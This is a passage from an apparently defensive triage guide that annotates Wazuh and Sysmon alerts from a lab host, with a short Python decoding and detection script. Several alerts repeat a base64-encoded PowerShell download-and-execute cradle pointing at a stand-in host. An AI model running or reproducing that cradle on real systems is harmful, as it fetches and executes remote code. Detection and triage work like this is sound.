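        print("decoded:", script)
        print("indicators:", cradle_indicators(script))
    print("chain:", process_chain(EID1_RECORDS, EID1_RECORDS[-1]["processGuid"]))
    print("policy probe:", is_ps_policy_probe(
        "C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_kteidnpa.tvp.ps1"))
```

Run as a script it prints the decoded cradle, its indicators, the chain 3616, 12292, 10312, 11220 and True for the probe file. The split this gives you for triage: the 92057 alerts are the real signal (a download cradle re-launching itself under one user and one logon session), while the 92213 alerts are PowerShell's startup artifact and belong in a local rule that lowers their level rather than in the on-call queue.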
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Third link of the chain: PID 11220 spawned by 10312, same encoded download cradle, same user and logon session.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 135 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535410.2912536 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon, so the data fields follow Sysmon's schema, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Sysmon's fixed provider GUID. Filter on it to pull Sysmon events only.
data.win.system.eventID: 1 Sysmon event ID, not a Security-log number: 1 = Process Create (4688 is the Security-log counterpart).
data.win.system.version: 5 Schema version of this event type (EID 1 is at v5 here).
data.win.system.level: 4 4 = Informational. Priority comes from the Wazuh rule, not from here.
data.win.system.task: 1 Task category. For Sysmon it simply mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode (0 = Info). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:48.8881088Z When the record was written to the log (UTC). About 1.6 s after the event's own utcTime here; sequence by utcTime, not by this.
data.win.system.eventRecordID: 351005 Incremental record number in the channel – handy for timeline order. The 32 records between 350972 and this one are Sysmon events that no rule promoted to an alert.
data.win.system.processID: 3712 PID of the writer, i.e. the Sysmon service, not the process the alert is about. The subject's PID is data.win.eventdata.processId.
data.win.system.threadID: 4740 Thread inside the Sysmon service that wrote the record. Not the subject's thread.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent subscribed to.
data.win.system.computer: Attacker Hostname that logged the event. Should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR). Informational for every ordinary Sysmon event; ignore it for triage.
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:47.245
ProcessGuid: {94294ddc-c1af-680a-080d-000000000e00}
ProcessId: 11220
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1aa-680a-060d-000000000e00}
ParentProcessId: 10312
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:47.245 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1af-680a-080d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11220 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1aa-680a-060d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10312 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 139 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535411.2920607 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:49.1622433Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351006 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:49.119
ProcessGuid: {94294ddc-c1af-680a-080d-000000000e00}
ProcessId: 11220
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_i2msvjaf.2l2.ps1
CreationUtcTime: 2025-04-24 22:56:49.119
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:49.119 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1af-680a-080d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11220 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_i2msvjaf.2l2.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:49.119 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 136 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535415.2923376 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:53.3837111Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351029 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:50.440
ProcessGuid: {94294ddc-c1b2-680a-0a0d-000000000e00}
ProcessId: 9788
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1af-680a-080d-000000000e00}
ParentProcessId: 11220
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:50.440 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1b2-680a-0a0d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9788 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1af-680a-080d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11220 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 140 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535415.2931443 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:53.6583905Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351030 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:53.627
ProcessGuid: {94294ddc-c1b2-680a-0a0d-000000000e00}
ProcessId: 9788
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_gep4ex1m.bat.ps1
CreationUtcTime: 2025-04-24 22:56:53.627
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:53.627 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1b2-680a-0a0d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9788 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gep4ex1m.bat.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:53.627 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 137 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535418.2934208 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:56.7879399Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351054 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:55.313
ProcessGuid: {94294ddc-c1b7-680a-0c0d-000000000e00}
ProcessId: 13984
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
